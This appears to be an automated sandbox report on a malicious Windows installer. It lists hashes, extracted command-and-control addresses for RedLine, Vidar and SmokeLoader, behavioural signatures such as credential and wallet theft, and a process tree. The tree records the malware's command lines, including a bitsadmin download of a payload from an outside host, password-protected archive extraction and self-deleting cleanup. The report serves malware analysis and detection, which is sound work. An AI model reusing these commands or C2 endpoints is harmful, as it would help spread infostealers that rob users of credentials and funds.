Resubmissions

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

05-07-2021 04:26

210705-z99jkt6lce 10

Analysis

  • max time kernel
    1801s
  • max time network
    1820s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    08-07-2021 11:08

General

  • Target

    setup_x86_x64_install - копия (12).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 33 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1848
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2364
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2324
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2632
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2624
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2616
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1248
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1204
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1096
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1044
                      • C:\Users\Admin\AppData\Roaming\tusbiwi
                        C:\Users\Admin\AppData\Roaming\tusbiwi
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        PID:4124
                      • C:\Users\Admin\AppData\Roaming\tusbiwi
                        C:\Users\Admin\AppData\Roaming\tusbiwi
                        2⤵
                        • Checks SCSI registry key(s)
                        PID:3152
                      • C:\Users\Admin\AppData\Roaming\wgsbiwi
                        C:\Users\Admin\AppData\Roaming\wgsbiwi
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:3920
                        • C:\Users\Admin\AppData\Roaming\wgsbiwi
                          C:\Users\Admin\AppData\Roaming\wgsbiwi
                          3⤵
                          • Checks SCSI registry key(s)
                          PID:1228
                      • C:\Users\Admin\AppData\Roaming\hssbiwi
                        C:\Users\Admin\AppData\Roaming\hssbiwi
                        2⤵
                        • Checks SCSI registry key(s)
                        PID:2036
                      • C:\Users\Admin\AppData\Roaming\wgsbiwi
                        C:\Users\Admin\AppData\Roaming\wgsbiwi
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:640
                        • C:\Users\Admin\AppData\Roaming\wgsbiwi
                          C:\Users\Admin\AppData\Roaming\wgsbiwi
                          3⤵
                          • Checks SCSI registry key(s)
                          PID:2148
                      • C:\Users\Admin\AppData\Roaming\hssbiwi
                        C:\Users\Admin\AppData\Roaming\hssbiwi
                        2⤵
                        • Checks SCSI registry key(s)
                        PID:6216
                      • C:\Users\Admin\AppData\Roaming\tusbiwi
                        C:\Users\Admin\AppData\Roaming\tusbiwi
                        2⤵
                        • Checks SCSI registry key(s)
                        PID:6752
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:64
                      • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (12).exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (12).exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:648
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2088
                          • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:4080
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c arnatic_1.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1488
                              • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_1.exe
                                arnatic_1.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2156
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                                  6⤵
                                    PID:5012
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im arnatic_1.exe /f
                                      7⤵
                                      • Kills process with taskkill
                                      PID:5056
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 6
                                      7⤵
                                      • Delays execution with timeout.exe
                                      PID:5096
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1156
                                • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_3.exe
                                  arnatic_3.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Suspicious use of WriteProcessMemory
                                  PID:3880
                                  • C:\Windows\SysWOW64\rUNdlL32.eXe
                                    "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                    6⤵
                                    • Loads dropped DLL
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:3492
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3136
                                • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_5.exe
                                  arnatic_5.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4020
                                  • C:\Users\Admin\AppData\Roaming\5197151.exe
                                    "C:\Users\Admin\AppData\Roaming\5197151.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    PID:2184
                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4460
                                  • C:\Users\Admin\AppData\Roaming\4918220.exe
                                    "C:\Users\Admin\AppData\Roaming\4918220.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4100
                                  • C:\Users\Admin\AppData\Roaming\1960206.exe
                                    "C:\Users\Admin\AppData\Roaming\1960206.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1340
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c arnatic_6.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2296
                                • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_6.exe
                                  arnatic_6.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  PID:3180
                                  • C:\Users\Admin\Documents\xG62ZycrtcoWPoz2gR9nVLEr.exe
                                    "C:\Users\Admin\Documents\xG62ZycrtcoWPoz2gR9nVLEr.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4476
                                    • C:\Users\Admin\Documents\xG62ZycrtcoWPoz2gR9nVLEr.exe
                                      "C:\Users\Admin\Documents\xG62ZycrtcoWPoz2gR9nVLEr.exe" -a
                                      7⤵
                                      • Executes dropped EXE
                                      PID:3084
                                  • C:\Users\Admin\Documents\52Gq5qG4m840iQcFDAa2gDjq.exe
                                    "C:\Users\Admin\Documents\52Gq5qG4m840iQcFDAa2gDjq.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4436
                                    • C:\Users\Admin\Documents\52Gq5qG4m840iQcFDAa2gDjq.exe
                                      "C:\Users\Admin\Documents\52Gq5qG4m840iQcFDAa2gDjq.exe"
                                      7⤵
                                      • Modifies data under HKEY_USERS
                                      PID:6620
                                  • C:\Users\Admin\Documents\Cz18PNveJcbRn_HOdMQ4QJSq.exe
                                    "C:\Users\Admin\Documents\Cz18PNveJcbRn_HOdMQ4QJSq.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4364
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c cmd < Poi.vsd
                                      7⤵
                                        PID:3896
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd
                                          8⤵
                                            PID:4216
                                            • C:\Windows\SysWOW64\findstr.exe
                                              findstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd
                                              9⤵
                                                PID:5168
                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                Dare.exe.com D
                                                9⤵
                                                • Executes dropped EXE
                                                PID:5528
                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                  10⤵
                                                  • Executes dropped EXE
                                                  PID:5720
                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                    11⤵
                                                    • Executes dropped EXE
                                                    PID:6040
                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                      12⤵
                                                        PID:4340
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                          13⤵
                                                          • Executes dropped EXE
                                                          PID:5508
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                            14⤵
                                                              PID:5108
                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                15⤵
                                                                • Executes dropped EXE
                                                                PID:5532
                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                  16⤵
                                                                  • Executes dropped EXE
                                                                  PID:4376
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                    17⤵
                                                                    • Executes dropped EXE
                                                                    PID:4184
                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                      18⤵
                                                                      • Executes dropped EXE
                                                                      PID:5540
                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                        19⤵
                                                                        • Executes dropped EXE
                                                                        PID:6112
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                          20⤵
                                                                            PID:5144
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                              21⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:5732
                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                C:\Windows\SysWOW64\nslookup.exe
                                                                                22⤵
                                                                                  PID:4212
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 240
                                                                                    23⤵
                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                    • Program crash
                                                                                    PID:5412
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 127.0.0.1 -n 30
                                                        9⤵
                                                        • Runs ping.exe
                                                        PID:5700
                                                • C:\Users\Admin\Documents\AcPabzasT6fzkyxbNoObATxy.exe
                                                  "C:\Users\Admin\Documents\AcPabzasT6fzkyxbNoObATxy.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:1056
                                                • C:\Users\Admin\Documents\Tky5Dh57593CcCLb6LbErmT7.exe
                                                  "C:\Users\Admin\Documents\Tky5Dh57593CcCLb6LbErmT7.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:4144
                                                • C:\Users\Admin\Documents\vpSNozS5n4SdTbFzmLL4laQo.exe
                                                  "C:\Users\Admin\Documents\vpSNozS5n4SdTbFzmLL4laQo.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:2184
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:4524
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5180
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:4340
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4252
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:3584
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5592
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                7⤵
                                                                • Checks for any installed AV software in registry
                                                                PID:3756
                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                7⤵
                                                                • Download via BitsAdmin
                                                                PID:4536
                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXCqGrdJb7sQvuEj -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                7⤵
                                                                  PID:6028
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -phs4opgQYQzGH8jz -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  7⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:7016
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5084
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5264
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4208
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:3152
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:6160
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                            7⤵
                                                                              PID:5496
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                8⤵
                                                                                • Drops file in System32 directory
                                                                                PID:5488
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:4692
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:3804
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:6968
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:772
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjA839.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:6288
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        7⤵
                                                                                          PID:5136
                                                                                      • C:\Users\Admin\Documents\EPNuRGSnxri1KfJlSyf6VquS.exe
                                                                                        "C:\Users\Admin\Documents\EPNuRGSnxri1KfJlSyf6VquS.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4444
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-9Q70C.tmp\EPNuRGSnxri1KfJlSyf6VquS.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-9Q70C.tmp\EPNuRGSnxri1KfJlSyf6VquS.tmp" /SL5="$4013E,28982256,486912,C:\Users\Admin\Documents\EPNuRGSnxri1KfJlSyf6VquS.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4672
                                                                                      • C:\Users\Admin\Documents\NgR7SsdnN85CYMmQ8ai0Mn2N.exe
                                                                                        "C:\Users\Admin\Documents\NgR7SsdnN85CYMmQ8ai0Mn2N.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:2688
                                                                                      • C:\Users\Admin\Documents\xF_1K1m6ZM7MtvEjZamooE3Q.exe
                                                                                        "C:\Users\Admin\Documents\xF_1K1m6ZM7MtvEjZamooE3Q.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4248
                                                                                        • C:\Users\Admin\Documents\xF_1K1m6ZM7MtvEjZamooE3Q.exe
                                                                                          C:\Users\Admin\Documents\xF_1K1m6ZM7MtvEjZamooE3Q.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4496
                                                                                      • C:\Users\Admin\Documents\Gq5f8Ung8Qo9DEee4gOwk33c.exe
                                                                                        "C:\Users\Admin\Documents\Gq5f8Ung8Qo9DEee4gOwk33c.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        PID:4408
                                                                                        • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                          "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3156
                                                                                          • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                            "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                            8⤵
                                                                                              PID:204
                                                                                          • C:\Program Files (x86)\Browzar\Browzar.exe
                                                                                            "C:\Program Files (x86)\Browzar\Browzar.exe"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:4848
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 2732
                                                                                              8⤵
                                                                                              • Program crash
                                                                                              PID:4292
                                                                                        • C:\Users\Admin\Documents\RvFdskdS26krgF9AG5eKIW6j.exe
                                                                                          "C:\Users\Admin\Documents\RvFdskdS26krgF9AG5eKIW6j.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4420
                                                                                          • C:\Users\Admin\Documents\RvFdskdS26krgF9AG5eKIW6j.exe
                                                                                            C:\Users\Admin\Documents\RvFdskdS26krgF9AG5eKIW6j.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2660
                                                                                        • C:\Users\Admin\Documents\WIMyFLI5ed8qwkPx7zHtcmTM.exe
                                                                                          "C:\Users\Admin\Documents\WIMyFLI5ed8qwkPx7zHtcmTM.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5028
